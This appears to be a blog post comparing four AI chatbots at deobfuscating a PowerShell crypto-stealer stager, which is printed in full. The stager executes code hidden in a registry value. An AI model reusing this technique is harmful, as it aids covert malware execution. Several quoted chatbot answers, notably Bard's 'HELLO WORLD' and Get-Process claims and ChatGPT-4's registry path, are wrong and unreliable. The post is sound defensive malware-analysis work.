Malware Analysis: GPT3.5 vs 4 vs Bing Chat vs Bard

Standard

I’ll just ignore the fact that this is my first post since 1683 days, because I can.

Today we are going to have a look at how ChatGPT revolutionized the way we perform static malware analysis, precisely obfuscated code analysis, AND I will be comparing the output of the top 4 currently available AI tools: ChatGPT-3.5, ChatGPT-4, Bing Chat GPT-4 and Google Bard.

In the last couple of days one of my sandbox machines got infected with a new PowerShell based CryptoStealer (Yay me 🎉 little do they know that I’m currently crypto-broke), which runs in 3 phases: A stager, which runs another stage-like code which communicates with a C2 server over DNS to run the actual malware in memory.

We will use the first PowerShell stager as an example for today, which is an obfuscated PS one-liner command that executes another script hidden in the registry. File contents below:

$JEzTkjdyrhDpDt=[ScriptBlock]; icm ($JEzTkjdyrhDpDt::Create([string]::Join('', ((gp (([regex]::Matches('kvbdBSZePlyrkirP nitraM\ERAWTFOS\:MLKH','.','RightToLeft') | ForEach {$_.value}) -join '')).'Ge1WvZfVx' | % { [char]$_ }))))

Depending on your PowerShell skills, it might take you anywhere from a couple of minutes to half an hour to manually de-obfuscate this code, but this ain’t 2010’s anymore, we have AI on our side now, so let’s use our new slaves to reduce this time to mere seconds.

I used the following prompt, followed by the stager code:

Rewrite the following obfuscated PowerShell script in a way that is easy to understand then explain what does it do, and, in summary, its main goal:

PS: I didn’t run any follow-up prompts to attempt to get better results, the displayed output is based solely on the initial prompt

Let’s check the results of each of the 4 tools:

ChatGPT-3.5

The PowerShell script you provided executes a single line of code that is heavily obfuscated, making it difficult to understand what it does.
Here is a simplified version of the script that is easier to read and understand:
$code = [string]::Join('', ((gp (([regex]::Matches('kvbdBSZePlyrkirP nitraM\ERAWTFOS\:MLKH','.','RightToLeft') | ForEach {$_.value}) -join '')).'Ge1WvZfVx' | % { [char]$_ }))
$block = [ScriptBlock]::Create($code)
Invoke-Command $block
This code creates a ScriptBlock object from an obfuscated string of code, then executes it using the Invoke-Command cmdlet. The main goal of this script is to execute the code contained in the obfuscated string. However, without knowing what the obfuscated code does, it's difficult to determine the purpose of the script as a whole.

Comments on ChatGPT-3.5

You call that de-obfuscated code??? My 4-year-old daughter can do better, thanks for nothing.

The goal description is also pretty useless, shame…

ChatGPT-4

The obfuscated PowerShell script can be rewritten in a more understandable way as follows:
$ScriptBlock = [ScriptBlock]
$ReversedString = 'kvbdBSZePlyrkirP nitraM\ERAWTFOS\:MLKH'
$Matches = [regex]::Matches($ReversedString, '.', 'RightToLeft') | ForEach {$_.value}
$JoinedMatches = -join $Matches
$Property = (gp $JoinedMatches).'Ge1WvZfVx'
$DecodedChars = $Property | % { [char]$_ }
$DecodedString = -join $DecodedChars
Invoke-Command -ScriptBlock $ScriptBlock::Create($DecodedString)
The script does the following:

1. Creates an empty ScriptBlock called $ScriptBlock.
2. Uses regex to reverse the string 'kvbdBSZePlyrkirP nitraM\ERAWTFOS\:MLKH', which results in 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'.
3. Creates a new script block using the newly obtained string as a path and appending 'Ge1WvZfVx' to the end of the path, creating 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ge1WvZfVx'.
4. Invokes the newly created script block using Invoke-Command.

In summary, the main goal of the script is to execute a hidden PowerShell script stored in the registry under the path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ge1WvZfVx'. The obfuscation is likely done to avoid detection by antivirus or other security measures, which is a common technique used in malicious scripts.

Comments on ChatGPT-4

While the reversed registry key path is not 100% accurate, it re-wrote the code in separate steps and made it much easier to understand, then explained it !

It also provided a very useful goal description, clear and easy to understand, also very accurate, it even used the word “hidden”, how cool is that !!

Bing Chat GPT-4

The PowerShell script you provided is obfuscated. Obfuscation is the practice of making code difficult to understand or read. It is often used to protect intellectual property or to hide malicious code.

The script appears to be using the Invoke-Command cmdlet (icm) to execute a script block (`$JEzTkjdyrhDpDt::Create([string]::Join(‘’, ((gp (([regex]::Matches(‘kvbdBSZePlyrkirP nitraM\ERAWTFOS:MLKH’,‘.’,‘RightToLeft’) | ForEach {$.value}) -join ‘’)).‘Ge1WvZfVx’ | % { [char]$ })))).

The script block is stored in the variable $JEzTkjdyrhDpDt. The script block appears to be created by calling the Create method on the $JEzTkjdyrhDpDt object. The Create method appears to be taking a string as input. The string is created by joining together the results of several commands.

Unfortunately, without more context it is difficult to determine what the script block does or what its main goal is. If you can provide more information about where this script came from or what it is supposed to do, I may be able to help you better.

Comments on Bing Chat

It didn’t even bother to try to write a de-obfuscated version of the code, we got a nimrod over here…

Also it tried to explain the obvious on the code level (poorly), not even close to goal-wise nor on a high level.

Google Bard

Sure, I can help you with that. Here is the rewritten PowerShell script:
$JEzTkjdyrhDpDt = [ScriptBlock]::Create('
$args = @()
foreach ($arg in $args) {
iex $arg
}
')

icm $JEzTkjdyrhDpDt::Create([string]::Join('', ((gp (([regex]::Matches('kvbdBSZePlyrkirP nitraM\ERAWTFOS:MLKH','.','RightToLeft') | ForEach {$_.value}) -join '')).'Ge1WvZfVx' | % { [char]$_ }))))
This script is a simple malware that runs a command on the system. It first creates a new script block, which is a type of PowerShell object that can be used to execute code. The script block contains a simple loop that executes the commands that are passed to it. The script then uses the Get-Process cmdlet to get a list of all the processes that are running on the system. It then uses the Regex cmdlet to find all of the processes that match a certain pattern. The pattern that it is looking for is kvbdBSZePlyrkirP nitraM\ERAWTFOS\:MLKH. This pattern is actually a string that has been reversed. When the string is reversed, it becomes HELLO WORLD. The script then uses the ForEach-Object cmdlet to iterate over the list of processes that match the pattern. For each process, it uses the iex cmdlet to execute the command that is associated with the process.

The main goal of this script is to run a command on the system. The command that it runs is determined by the string that is passed to it. The string that is passed to it is actually a reversed string that contains the command that the script should run.

Comments on Bard

Bard did try to de-obfuscate the code, but tried very poorly, useless.

But it DID identifies it as Malware, so Kudos for that, also it knew the main goal (executing a command on the system), although it got chocked-up on technicalities.

Verdict

This is an easy one: Chapeau bas to the OG, ChatGPT-4 is just on another level!
Of course the others COULD perform better with follow-up prompts, but ChatGPT-4 did not require any 🤩

What do you think? Have you tried any more powerful tools for this type of analysis?